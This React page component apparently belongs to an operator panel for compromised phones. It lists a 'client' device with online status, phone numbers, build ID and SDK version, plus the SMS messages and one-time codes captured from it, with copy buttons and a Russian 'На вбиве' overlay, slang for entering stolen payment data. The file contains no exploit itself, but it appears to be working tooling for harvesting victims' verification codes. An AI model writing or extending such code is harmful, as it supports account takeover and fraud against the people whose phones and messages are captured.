import { socket } from '@/api/socket';
import { SOCKET_EVENTS } from '@/api/socket-events';
import ClientPhones from '@/components/client/client-phones';
import { OnlineStatusBadge } from '@/components/navigation/entity-hero-card';
import SelectTgStatus from '@/components/select-tg-status';
import { LogoLoader } from '@/components/logo-loader';
import { $myClients, $selectedMyClient, $setSelectedMyClient } from '@/entities/my-clients-entity';
import { $myCodes, $setMyCodes } from '@/entities/my-codes-entity';
import { PageScroll } from '@/layouts/page-layout';
import { isDevMode } from '@/lib/is-dev-mode';
import { getMockCodesForClient } from '@/mocks/fixtures';
import { useUnit } from 'effector-react';
import { AsteriskIcon, ContainerIcon, CornerDownRightIcon, FileTextIcon, HashIcon, LayoutGridIcon } from 'lucide-react';
import { useEffect, useMemo } from 'react';
import { useParams } from 'react-router';
import { toast } from 'sonner';

export default function MyClientPage() {
	const params = useParams();
	const [client, codes, setMyCodes, setSelectedMyClient, myClients] = useUnit([
		$selectedMyClient,
		$myCodes,
		$setMyCodes,
		$setSelectedMyClient,
		$myClients,
	]);

	useEffect(() => {
		return () => {
			setSelectedMyClient(null);
			setMyCodes([]);
		};
	}, [setSelectedMyClient, setMyCodes]);

	useEffect(() => {
		if (!params.id) return;

		if (isDevMode) {
			const found = myClients.find(c => c.id === params.id);
			if (found) {
				setSelectedMyClient(found);
				setMyCodes(getMockCodesForClient(found.id));
			}
			return;
		}

		if (!socket) return;
		socket.emit(SOCKET_EVENTS.getMyClient, { clientId: params.id });
	}, [params, myClients, setSelectedMyClient, setMyCodes]);

	const phones = useMemo(() => client?.phones?.filter(p => p) ?? [], [client?.phones]);

	function handleCopy(text: string) {
		navigator.clipboard
			.writeText(text)
			.then(() => toast.success('Скопировано'))
			.catch(() => toast.error('Ошибка копирования'));
	}

	if (!client) {
		return (
			<div className='absolute inset-0 flex items-center justify-center'>
				<LogoLoader />
			</div>
		);
	}

	return (
		<PageScroll contentClassName='p-2 flex flex-col gap-2'>
			<div
				className='relative px-2 py-2 bg-card border border-border rounded-md grid gap-2 border-l-2'
				style={{
					borderLeftColor: client.takeStatus === 1 ? '#ad46ff' : client.isOnline ? 'var(--chart-2)' : 'var(--chart-5)',
				}}
			>
				{client.takeStatus === 1 && (
					<div
						className='absolute inset-0 font-semibold flex items-center justify-center select-none bg-black/10 z-2 rounded-md'
						style={{ backdropFilter: 'blur(4px)' }}
					>
						На вбиве - {client.takenFrom}
					</div>
				)}
				<div className='flex items-center justify-between gap-2'>
					<button type='button' className='flex gap-1 items-center text-left min-w-0' onClick={() => handleCopy('#' + client.id)}>
						<HashIcon size={14} className='opacity-40 shrink-0' />
						<span className='text-sm font-semibold hover:bg-accent rounded-xs px-0.5 cursor-pointer select-none truncate'>{client.id}</span>
					</button>
					<OnlineStatusBadge isOnline={client.isOnline} />
				</div>
				<ClientPhones phones={phones} onCopy={handleCopy} variant='simple' />
				<button type='button' className='flex gap-1 items-center text-left' onClick={() => handleCopy(client.buildId)}>
					<ContainerIcon size={14} className='opacity-40 shrink-0' />
					<span className='text-sm hover:bg-accent rounded-xs px-0.5 cursor-pointer select-none truncate'>{client.buildId}</span>
				</button>
				<button type='button' className='flex gap-1 items-center text-left' onClick={() => handleCopy(client.sdkVersion)}>
					<LayoutGridIcon size={14} className='opacity-40 shrink-0' />
					<span className='text-sm hover:bg-accent rounded-xs px-0.5 cursor-pointer select-none truncate'>{client.sdkVersion}</span>
				</button>
				<div className='flex justify-end'>
					<SelectTgStatus client={client} />
				</div>
			</div>
			<h2 className='text-sm font-semibold text-muted-foreground uppercase tracking-wide'>Коды</h2>
			{codes.length ? (
				codes.map(code => (
					<div key={code.id} className='bg-card p-2 rounded-md border-border border'>
						<div className='flex items-center gap-1'>
							<CornerDownRightIcon size={15} className='opacity-50' />
							<button type='button' className='hover:bg-accent active:bg-accent cursor-pointer select-none' onClick={() => handleCopy(code.sender)}>
								<span className='opacity-70'>От: </span>
								{code.sender}
							</button>
						</div>
						<div className='flex items-center gap-1'>
							<span className='break-all'>
								<FileTextIcon size={15} className='opacity-50 min-w-[15px] inline-block mr-1' />
								<span className='opacity-70'>Текст: </span>
								<span>{code.text}</span>
							</span>
						</div>
						<div className='flex items-center gap-1'>
							<AsteriskIcon size={15} className='opacity-50' />
							<button
								type='button'
								className='hover:bg-accent active:bg-accent cursor-pointer select-none'
								onClick={() => handleCopy(code.code ?? '')}
							>
								<span className='opacity-70'>Код: </span>
								{code.code}
							</button>
						</div>
					</div>
				))
			) : (
				<div className='text-center mt-10 text-sm text-muted-foreground'>Сообщений с кодом нет</div>
			)}
		</PageScroll>
	);
}
